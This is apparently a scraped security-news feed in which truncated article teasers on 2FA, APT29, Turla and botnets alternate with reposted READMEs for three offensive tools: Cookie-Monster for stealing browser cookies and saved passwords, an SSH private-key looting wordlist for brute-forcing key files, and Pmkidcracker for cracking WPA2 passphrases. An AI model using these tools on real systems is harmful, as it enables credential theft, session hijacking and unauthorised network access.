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6 Mistakes Organizations Make When Deploying Advanced Authentication

Deploying advanced authentication measures is key to helping organizations address their weakest cybersecurity link: their human users. Having some form of 2-factor authentication in place is a great start, but many organizations may not yet be in that spot or have the needed level of authentication sophistication to adequately safeguard organizational data. When deploying

Google Simplifies 2-Factor Authentication Setup (It's More Important Than Ever)

Google on Monday announced that it's simplifying the process of enabling two-factor authentication (2FA) for users with personal and Workspace accounts. Also called 2-Step Verification (2SV), it aims to add an extra layer of security to users' accounts to prevent takeover attacks in case the passwords are stolen. The new change entails adding a second step method, such as an

Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\ "XHh..." --cookies ChromeCookie.db

Results Example:
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\ "XHh..." --passwords ChromePasswords.db

Results Example:
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:


Ensure Mingw-w64 and make is installed on the linux prior to compiling.


to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32


  • update to support firefox based on firepwd and add bruteforce module based on DonPAPI


This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor:
Fileless download:
Decrypt Cookies and Login Data:

TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy

A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small home/small office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless. "TheMoon, which&nbsp;emerged&nbsp;in&nbsp;2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen

Telegram Offers Premium Subscription in Exchange for Using Your Number to Send OTPs

In June 2017, a&nbsp;study&nbsp;of more than 3,000 Massachusetts Institute of Technology (MIT) students&nbsp;published&nbsp;by the National Bureau for Economic Research (NBER) found that 98% of them were willing to give away their friends' email addresses in exchange for free pizza. "Whereas people say they care about privacy, they are willing to relinquish private data quite easily when

Key Lesson from Microsoft’s Password Spray Hack: Secure Every Account

In January 2024, Microsoft discovered they’d been the&nbsp;victim of a hack&nbsp;orchestrated by Russian-state hackers Midnight Blizzard (sometimes known as Nobelium). The concerning detail about this case is how easy it was to breach the software giant. It wasn’t a highly technical hack that exploited a zero-day vulnerability – the hackers used a simple password spray attack to take control of

SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names

By: Zion3R

SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.

LFI for Lateral Movement? Gain SSH Access?

SSH Private Key Looting Wordlists πŸ”’πŸ—οΈ

This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.

Wordlist Files πŸ“
  • ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
  • ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
  • ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
  • ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.

Usage πŸš€

These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.

Acknowledgements πŸ™

This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."

Disclaimer ⚠️

Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.

Superusers Need Super Protection: How to Bridge Privileged Access Management and Identity Management

Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls.&nbsp;On top of that, most cybersecurity risks are caused by just a few superusers – typically one out of 200 users.&nbsp;There’s a company aiming to fix the gap between traditional PAM and IdM

Five Eyes Agencies Expose APT29's Evolving Cloud Attack Tactics

Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as&nbsp;APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the

SaaS Compliance through the NIST Cybersecurity Framework

The US National Institute of Standards and Technology (NIST) cybersecurity framework is one of the world's most important guidelines for securing networks. It can be applied to any number of applications, including SaaS.&nbsp; One of the challenges facing those tasked with securing SaaS applications is the different settings found in each application. It makes it difficult to develop a

Russian Turla Hackers Target Polish NGOs with New TinyTurla-NG Backdoor

The Russia-linked threat actor known as Turla has been observed using a new backdoor called&nbsp;TinyTurla-NG&nbsp;as part of a three-month-long campaign targeting Polish non-governmental organizations in December 2023. "TinyTurla-NG, just like TinyTurla, is a small 'last chance' backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been

4 Ways Hackers use Social Engineering to Bypass MFA

When it comes to access security, one recommendation stands out above the rest: multi-factor authentication (MFA). With passwords alone being simple work for hackers, MFA provides an essential layer of protection against breaches. However, it's important to remember that MFA isn't foolproof. It can be bypassed, and it often is.&nbsp; If a password is compromised, there are several options

Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs

Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a&nbsp;cyber attack on its systems&nbsp;in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE)&nbsp;revealed&nbsp;that it had been the victim of an attack perpetrated by a hacking crew

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run


This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining

A new Mirai-based botnet called&nbsp;NoaBot&nbsp;is being used by threat actors as part of a crypto mining campaign since the beginning of 2023. β€œThe capabilities of the new botnet, NoaBot, include a wormable self-spreader and an SSH key backdoor to download and execute additional binaries or spread itself to new victims,” Akamai security researcher Stiv Kupchik said in a report shared with The